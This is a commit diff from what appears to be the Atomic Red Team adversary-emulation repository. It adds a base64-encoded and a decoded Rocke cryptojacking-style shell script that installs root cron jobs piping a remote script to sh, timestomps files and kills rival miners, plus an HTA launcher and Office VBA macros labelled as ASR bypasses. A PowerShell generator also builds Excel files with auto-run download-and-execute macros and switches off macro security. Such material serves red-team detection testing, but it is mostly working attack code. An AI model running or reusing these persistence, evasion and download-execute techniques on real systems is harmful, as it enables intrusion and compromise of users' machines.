di9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAieG1yIiB8IGF3ayAne3ByaW50
ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8
Z3JlcCAibWluZXJkIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxs
IDI+JjEKCiMgICBUYWN0aWM6IERpc2NvdmVyeQojICAgVGVjaG5pcXVlOiBUMTA0OSAtIFN5c3Rl
bSBOZXR3b3JrIENvbm5lY3Rpb25zIERpc2NvdmVyeQpuZXRzdGF0IC1hbnAgfCBncmVwIDozMzMz
IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxs
IC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDo0NDQ0IHxhd2sgJ3twcmlu
dCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251
bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDo1NTU1IHxhd2sgJ3twcmludCAkN30nfCBhd2sg
LUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRz
dGF0IC1hbnAgfCBncmVwIDo2NjY2IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3By
aW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBn
cmVwIDo3Nzc3IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4
YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDozMzQ3IHxh
d2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05
ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDoxNDQ0NCB8YXdrICd7cHJpbnQg
JDd9J3wgYXdrIC1GJ1svXScgJ3twcmludCAkMX0nIHwgeGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxs
IDI+JjEKbmV0c3RhdCAtYW5wIHwgZ3JlcCA6MTQ0MzMgfGF3ayAne3ByaW50ICQ3fSd8IGF3ayAt
RidbL10nICd7cHJpbnQgJDF9JyB8IHhhcmdzIGtpbGwgLTkgPi9kZXYvbnVsbCAyPiYxCgplY2hv
ICQoZGF0ZSAtdSkgIkV4ZWN1dGVkIEF0b21pYyBSZWQgVGVhbSBSb2NrZSBhbmQgUm9sbCwgU3Rh
Z2UgMDIsIHBhcnQgQyIgPj4gL3RtcC9hdG9taWMubG9nCn0KCmZ1bmN0aW9uIGIoKSB7CiAgICBt
a2RpciAtcCAvdmFyL3RtcAoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lvbgogICAgIyAg
IFRlY2huaXF1ZTogVDEyMjIgLSBGaWxlIFBlcm1pc3Npb24gTW9kaWZpY2F0aW9uCiAgICBjaG1v
ZCAxNzc3IC92YXIvdG1wCgogICAgIyAgIFRhY3RpYzogRGVmZW5zZSBFdmFzaW9uCiAgICAjICAg
VGVjaG5pcXVlOiBUMTAzNiAtIE1hc3F1ZXJhZGluZwogICAgKGN1cmwgLWZzU0wgLS1jb25uZWN0
LXRpbWVvdXQgMTIwIGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnlj
by9hdG9taWMtcmVkLXRlYW0vbWFzdGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvYXRvbWlj
LWhlbGxvIC1vIC92YXIvdG1wL2t3b3JrZXJkc3x8d2dldCBodHRwczovL3Jhdy5naXRodWJ1c2Vy
Y29udGVudC5jb20vcmVkY2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMv
Q2hhaW5fUmVhY3Rpb25zL2F0b21pYy1oZWxsbyAtTyAvdmFyL3RtcC9rd29ya2VyZHMpICYmIGNo
bW9kICt4IC92YXIvdG1wL2t3b3JrZXJkcwogICAgbm9odXAgL3Zhci90bXAva3dvcmtlcmRzID4v
ZGV2L251bGwgMj4mMSAmCgogICAgZWNobyAkKGRhdGUgLXUpICJFeGVjdXRlZCBBdG9taWMgUmVk
IFRlYW0gUm9ja2UgYW5kIFJvbGwsIFN0YWdlIDAyLCBwYXJ0IEIiID4+IC90bXAvYXRvbWljLmxv
Zwp9CgpmdW5jdGlvbiBhKCkgewoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lvbgogICAg
IyAgIFRlY2huaXF1ZTogVDEyMjIgLSBGaWxlIFBlcm1pc3Npb24gTW9kaWZpY2F0aW9uCgljaGF0
dHIgLWkgL2V0Yy9jcm9uLmQvcm9vdCAvdmFyL3Nwb29sL2Nyb24vcm9vdCAvdmFyL3Nwb29sL2Ny
b24vY3JvbnRhYnMvcm9vdAoKICAgICMgICBUYWN0aWM6IFBlcnNpc3RlbmNlCiAgICAjICAgVGVj
aG5pcXVlOiBUMTE2OCAtIExvY2FsIEpvYiBTY2hlZHVsaW5nCgllY2hvIC1lICIqLzEwICogKiAq
ICogcm9vdCAoY3VybCAtZnNTTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmVk
Y2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMvQ2hhaW5fUmVhY3Rpb25z
L3JvY2tlLWFuZC1yb2xsLXN0YWdlLTAyLWRlY29kZWQuc2h8fHdnZXQgLXEgLU8tIGh0dHBzOi8v
cmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFz
dGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVj
b2RlZC5zaCl8c2hcbiMjIiA+IC9ldGMvY3Jvbi5kL3Jvb3QKCW1rZGlyIC1wIC92YXIvc3Bvb2wv
Y3Jvbi9jcm9udGFicwoJZWNobyAtZSAiKi8zMSAqICogKiAqIChjdXJsIC1mc1NMIGh0dHBzOi8v
cmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFz
dGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVj
b2RlZC5zaHx8d2dldCAtcSAtTy0gaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Jl
ZGNhbmFyeWNvL2F0b21pYy1yZWQtdGVhbS9tYXN0ZXIvQVJUaWZhY3RzL0NoYWluX1JlYWN0aW9u
cy9yb2NrZS1hbmQtcm9sbC1zdGFnZS0wMi1kZWNvZGVkLnNoKXxzaFxuIyMiID4gL3Zhci9zcG9v
bC9jcm9uL2Nyb250YWJzL3Jvb3QKCW1rZGlyIC1wIC9ldGMvY3Jvbi5kYWlseQoJKGN1cmwgLWZz
U0wgLS1jb25uZWN0LXRpbWVvdXQgMTIwIGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNv
bS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFzdGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFj
dGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVjb2RlZC5zaCAtbyAvZXRjL2Nyb24uZGFp
bHkvb2FuYWNyb25lcnx8d2dldCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmVk
Y2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMvQ2hhaW5fUmVhY3Rpb25z
L3JvY2tlLWFuZC1yb2xsLXN0YWdlLTAyLWRlY29kZWQuc2ggLU8gL2V0Yy9jcm9uLmRhaWx5L29h
bmFjcm9uZXIpCgogICAgIyAgIFRhY3RpYzogRGVmZW5zZSBFdmFzaW9uCiAgICAjICAgVGVjaG5p
cXVlOiBUMTIyMiAtIEZpbGUgUGVybWlzc2lvbiBNb2RpZmljYXRpb24KICAgIGNobW9kIDc1NSAv
ZXRjL2Nyb24uZGFpbHkvb2FuYWNyb25lcgoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lv
bgogICAgIyAgIFRlY2huaXF1ZTogVDEwOTkgLSBUaW1lc3RvbXAKCXRvdWNoIC1hY21yIC9iaW4v
c2ggL2V0Yy9jcm9uLmRhaWx5L29hbmFjcm9uZXIKICAgIHRvdWNoIC1hY21yIC9iaW4vc2ggL2V0
Yy9jcm9uLmQvcm9vdAogICAgdG91Y2ggLWFjbXIgL2Jpbi9zaCAvdmFyL3Nwb29sL2Nyb24vY3Jv
bnRhYnMvcm9vdAoKICAgIGVjaG8gJChkYXRlIC11KSAiRXhlY3V0ZWQgQXRvbWljIFJlZCBUZWFt
IFJvY2tlIGFuZCBSb2xsLCBTdGFnZSAwMiwgcGFydCBBIiA+PiAvdG1wL2F0b21pYy5sb2cKfQoK
YQpiCmM=
ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh
+90
View File
@@ -0,0 +1,90 @@
#! /bin/bash
function c() {
pkill -f sourplum
pkill -f xmrig
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f minexmr
pkill -f minerd
pkill -f minergate
pkill -f kworker34
pkill -f Xbash
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chattr -i /tmp/kworkerds /var/tmp/kworkerds
# Tactic: Defense Evasion
# Technique: T1107 - File Deletion
rm -rf /tmp/kworkerds /var/tmp/kworkerds
# Tactic: Discovery
# Technique: T1057 - Process Discovery
ps auxf|grep -v grep|grep -v "\_" |grep -v "kthreadd" |grep "\[.*\]"|awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "Xbash" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "stratum" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "minerd" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
# Tactic: Discovery
# Technique: T1049 - System Network Connections Discovery
netstat -anp | grep :3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :14433 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part C" >> /tmp/atomic.log
}
function b() {
mkdir -p /var/tmp
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chmod 1777 /var/tmp
# Tactic: Defense Evasion
# Technique: T1036 - Masquerading
(curl -fsSL --connect-timeout 120 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -o /var/tmp/kworkerds||wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -O /var/tmp/kworkerds) && chmod +x /var/tmp/kworkerds
nohup /var/tmp/kworkerds >/dev/null 2>&1 &
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part B" >> /tmp/atomic.log
}
function a() {
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chattr -i /etc/cron.d/root /var/spool/cron/root /var/spool/cron/crontabs/root
# Tactic: Persistence
# Technique: T1168 - Local Job Scheduling
echo -e "*/10 * * * * root (curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh||wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|sh\n##" > /etc/cron.d/root
mkdir -p /var/spool/cron/crontabs
echo -e "*/31 * * * * (curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh||wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|sh\n##" > /var/spool/cron/crontabs/root
mkdir -p /etc/cron.daily
(curl -fsSL --connect-timeout 120 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh -o /etc/cron.daily/oanacroner||wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh -O /etc/cron.daily/oanacroner)
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chmod 755 /etc/cron.daily/oanacroner
# Tactic: Defense Evasion
# Technique: T1099 - Timestomp
touch -acmr /bin/sh /etc/cron.daily/oanacroner
touch -acmr /bin/sh /etc/cron.d/root
touch -acmr /bin/sh /var/spool/cron/crontabs/root
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part A" >> /tmp/atomic.log
}
a
b
c
ARTifacts/Initial_Access/Atomic.doc
BIN
View File
Binary file not shown.
ARTifacts/Initial_Access/AtomicHTA.hta
+29
View File
@@ -0,0 +1,29 @@
<html>
<script language="JScript">
// Type One
// Child of Explorer, cmd.exe
var ShellWindows = "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}";
var SW = GetObject("new:" + ShellWindows).Item();
SW.Document.Application.ShellExecute("cmd.exe", "/c calc.exe", 'C:\\Windows\\System32', null, 0);
// Type Two
// Child of wmiprvse
var strComputer = ".";
var objWMIService = GetObject("winmgmts:\\\\" + strComputer + "\\root\\cimv2");
var objStartup = objWMIService.Get("Win32_ProcessStartup");
var objConfig = objStartup.SpawnInstance_();
objConfig.ShowWindow = 0;
var objProcess = GetObject("winmgmts:\\\\" + strComputer + "\\root\\cimv2:Win32_Process");
var intProcessID;
objProcess.Create("cmd.exe", null, objConfig, intProcessID);
// Type Three
// Child of mshta.exe
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
close();
</script>
</html>
ARTifacts/Initial_Access/Listener.md
+26
View File
@@ -0,0 +1,26 @@
# Listeners
Simple methods to simulate C2 server
## Python
python3
`python3 -m http.server 9000`
python2
`python -m SimpleHTTPServer 9000`
## PowerShell
[PowerShell Webserver](https://gallery.technet.microsoft.com/scriptcenter/Powershell-Webserver-74dcf466)
Start webserver with binding to http://localhost:8080/ (assuming the script is in the current directory):
PowerShell
`.\Start-Webserver.ps1`
Start webserver with binding to all IP addresses of the system and port 8080 (assuming the script is in the current directory).
Administrative rights are necessary:
PowerShell
`.\Start-Webserver.ps1 "http://+:8080/"`
ARTifacts/Initial_Access/Office_Macro_COM.md
+55
View File
@@ -0,0 +1,55 @@
# Office Macro - COM
reference: https://gist.github.com/infosecn1nja/24a733c5b3f0e5a8b6f0ca2cf75967e3
### WordShellExecute
Word.
explorer->cmd->powershell.
```
Sub ASR_bypass_create_child_process_rule4()
Const ShellWindows = _
"{9BA05972-F6A8-11CF-A442-00A0C90A8F39}"
Set SW = GetObject("new:" & ShellWindows).Item()
SW.Document.Application.ShellExecute "cmd.exe", "/c powershell.exe IWR -uri ""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat"" -OutFile ""~\Documents\payload.bat"" ; ~\Documents\payload.bat", "C:\Windows\System32", Null, 0
End Sub
```
### WordWmicCreateProcess
Word.
Wmiprvse.exe->cmd->powershell.
```
Sub ASR_bypass_create_child_process_rule5()
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("win" & "mgmts" & ":\\" & strComputer & "\root" & "\cimv2")
Set objStartup = objWMIService.Get("Win32_" & "Process" & "Startup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root" & "\cimv2" & ":Win32_" & "Process")
objProcess.Create "cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')", Null, objConfig, intProcessID
End Sub
```
### WordBenignWMICCreateProcess
Word.
Wmiprvse.exe->cmd->powershell.
This method does not execute mimikatz.
```
Sub ASR_bypass_create_child_process_rule5()
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("win" & "mgmts" & ":\\" & strComputer & "\root" & "\cimv2")
Set objStartup = objWMIService.Get("Win32_" & "Process" & "Startup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root" & "\cimv2" & ":Win32_" & "Process")
objProcess.Create "cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/dragonstail_benign.ps1')", Null, objConfig, intProcessID
End Sub
```
ARTifacts/Initial_Access/Zipped_Malware.md
+9
View File
@@ -0,0 +1,9 @@
# Zipped Malware
A common method actors use to deliver is through zip attachments in email.
## ZIP + VBS Example
Take the following [qbot chain reaction](https://github.com/redcanaryco/atomic-red-team/blob/master/ARTifacts/Chain_Reactions/qbot_infection_reaction.vbs) and compress (zip) the vbs file to be used for delivery.
Simulate other file types by zipping and deliver to the receiving device.
ARTifacts/Initial_Access/generate-macro.ps1
+560
View File
@@ -0,0 +1,560 @@
#Adopted and Originally Coded by Matt Nelson (@enigma0x3)
#Reference: https://github.com/enigma0x3/Generate-Macro/blob/master/Generate-Macro.ps1
<#
.SYNOPSIS
Standalone Powershell script that will generate a malicious Microsoft Office document with a specified payload and persistence method
.DESCRIPTION
This script will generate malicious Microsoft Excel Documents that contain VBA macros.
The script will display a menu of different attacks, all with different ASR Bypass methods. Once an attack is chosen.
When naming the document, don't include a file extension.
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.Attack Types
All 7 instances represent different ASR Bypasses based on research performed by great folks within the industry. All macros were absorbed from https://gist.github.com/infosecn1nja/24a733c5b3f0e5a8b6f0ca2cf75967e3.
Additional references:
- https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
- https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
- https://www.darkoperator.com/blog/2017/11/8/windows-defender-exploit-guard-asr-obfuscated-script-rule
- https://posts.specterops.io/the-emet-attack-surface-reduction-replacement-in-windows-10-rs3-the-good-the-bad-and-the-ugly-34d5a253f3df
- https://oddvar.moe/2018/03/15/windows-defender-attack-surface-reduction-rules-bypass/
.EXAMPLE
PS> ./Generate-Macro.ps1
Enter the name of the document (Do not include a file extension): FinancialData
--------Select Attack---------
1. Chain Reaction Download and execute with Excel.
2. Chain Reaction Download and execute with Excel, wmiprvse
3. Chain Reaction Download and execute with Excel, wmiprvse benign
4. Chain Reaction Download and execute with Excel Shell
5. Chain Reaction Download and execute with Excel ShellBrowserWindow
6. Chain Reaction Download and execute with Excel WshShell
7. Chain Reaction Download and execute with Excel and POST C2.
8. Chain Reaction Download and execute with Excel and GET C2.
------------------------------
Saved to file C:\Users\Malware\Desktop\FinancialData.xls
PS>
#>
$global:defLoc = "$env:userprofile\Desktop"
$global:Name = Read-Host "Enter the name of the document (Do not include a file extension)"
$global:Name = $global:Name + ".xls"
$global:FullName = "$global:defLoc\$global:Name"
function Excel-Shell {
<#
.SYNOPSIS
Standard macro execution.
.DESCRIPTION
Upon execution, Excel will spawn cmd.exe to download and execute a chain reaction via powershell.
#>
#create macro
$Code = @"
Sub Auto_Open()
Call Shell("cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')", 1)
End Sub
"@
#Create excel document
$Excel01 = New-Object -ComObject "Excel.Application"
$ExcelVersion = $Excel01.Version
#Disable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01.DisplayAlerts = $false
$Excel01.DisplayAlerts = "wdAlertsNone"
$Excel01.Visible = $false
$Workbook01 = $Excel01.Workbooks.Add(1)
$Worksheet01 = $Workbook01.WorkSheets.Item(1)
$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
$ExcelModule.CodeModule.AddFromString($Code)
#Save the document
Add-Type -AssemblyName Microsoft.Office.Interop.Excel
$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
Write-Output "Saved to file $global:Fullname"
#Cleanup
$Excel01.Workbooks.Close()
$Excel01.Quit()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
$Excel01 = $Null
if (ps excel){kill -name excel}
#Enable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
function Excel-Com-Wmiprvse-Benign-Trampoline {
<#
.SYNOPSIS
Uses COM to download and execute a chain reaction via wmiprvse. This version will not execute mimikatz.
.DESCRIPTION
Using COM, upon macro execution, wmiprvse will spawn cmd.exe to run powershell to download and execute a benign chain reaction.
#>
#create macro
$Code = @"
Sub Auto_Open()
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("win" & "mgmts" & ":\\" & strComputer & "\root" & "\cimv2")
Set objStartup = objWMIService.Get("Win32_" & "Process" & "Startup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root" & "\cimv2" & ":Win32_" & "Process")
objProcess.Create "cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/dragonstail_benign.ps1')", Null, objConfig, intProcessID
End Sub
"@
#Create excel document
$Excel01 = New-Object -ComObject "Excel.Application"
$ExcelVersion = $Excel01.Version
#Disable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01.DisplayAlerts = $false
$Excel01.DisplayAlerts = "wdAlertsNone"
$Excel01.Visible = $false
$Workbook01 = $Excel01.Workbooks.Add(1)
$Worksheet01 = $Workbook01.WorkSheets.Item(1)
$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
$ExcelModule.CodeModule.AddFromString($Code)
#Save the document
Add-Type -AssemblyName Microsoft.Office.Interop.Excel
$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
Write-Output "Saved to file $global:Fullname"
#Cleanup
$Excel01.Workbooks.Close()
$Excel01.Quit()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
$Excel01 = $Null
if (ps excel){kill -name excel}
#Enable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
function Excel-Com-Wmiprvse-Trampoline {
<#
.SYNOPSIS
Uses COM to download and execute chain reaction via wmiprvse.
.DESCRIPTION
Using COM, upon macro execution, wmiprvse will spawn cmd.exe to run powershell to download and execute a benign chain reaction.
#>
#create macro
$Code = @"
Sub Auto_Open()
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("win" & "mgmts" & ":\\" & strComputer & "\root" & "\cimv2")
Set objStartup = objWMIService.Get("Win32_" & "Process" & "Startup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root" & "\cimv2" & ":Win32_" & "Process")
objProcess.Create "cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')", Null, objConfig, intProcessID
End Sub
"@
#Create excel document
$Excel01 = New-Object -ComObject "Excel.Application"
$ExcelVersion = $Excel01.Version
#Disable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01.DisplayAlerts = $false
$Excel01.DisplayAlerts = "wdAlertsNone"
$Excel01.Visible = $false
$Workbook01 = $Excel01.Workbooks.Add(1)
$Worksheet01 = $Workbook01.WorkSheets.Item(1)
$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
$ExcelModule.CodeModule.AddFromString($Code)
#Save the document
Add-Type -AssemblyName Microsoft.Office.Interop.Excel
$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
Write-Output "Saved to file $global:Fullname"
#Cleanup
$Excel01.Workbooks.Close()
$Excel01.Quit()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
$Excel01 = $Null
if (ps excel){kill -name excel}
#Enable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 0 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 0 -Force | Out-Null
}
function Excel-Com-Trampoline {
<#
.SYNOPSIS
Excel COM Trampoline.
.DESCRIPTION
Using COM, upon macro execution, wmiprvse will spawn cmd.exe to run powershell to download and execute a chain reaction.
#>
#create macro
$Code = @"
Sub Auto_Open()
Const ShellWindows = _
"{9BA05972-F6A8-11CF-A442-00A0C90A8F39}"
Set SW = GetObject("new:" & ShellWindows).Item()
SW.Document.Application.ShellExecute "cmd.exe", "/c powershell.exe IWR -uri ""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1"" -OutFile ""~\Documents\payload.bat"" ; ~\Documents\payload.bat", "C:\Windows\System32", Null, 0
End Sub
"@
#Create excel document
$Excel01 = New-Object -ComObject "Excel.Application"
$ExcelVersion = $Excel01.Version
#Disable Macro Security
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security" -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
$Excel01.DisplayAlerts = $false
$Excel01.DisplayAlerts = "wdAlertsNone"
$Excel01.Visible = $false
$Workbook01 = $Excel01.Workbooks.Add(1)
$Worksheet01 = $Workbook01.WorkSheets.Item(1)
$ExcelModule = $Workbook01.VBProject.VBComponents.Add(1)
$ExcelModule.CodeModule.AddFromString($Code)
#Save the document
Add-Type -AssemblyName Microsoft.Office.Interop.Excel
$Workbook01.SaveAs("$global:FullName", [Microsoft.Office.Interop.Excel.XlFileFormat]::xlExcel8)
Write-Output "Saved to file $global:Fullname"
#Cleanup
$Excel01.Workbooks.Close()
$Excel01.Quit()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($Excel01) | out-null
$Excel01 = $Null
if (ps excel){kill -name excel}
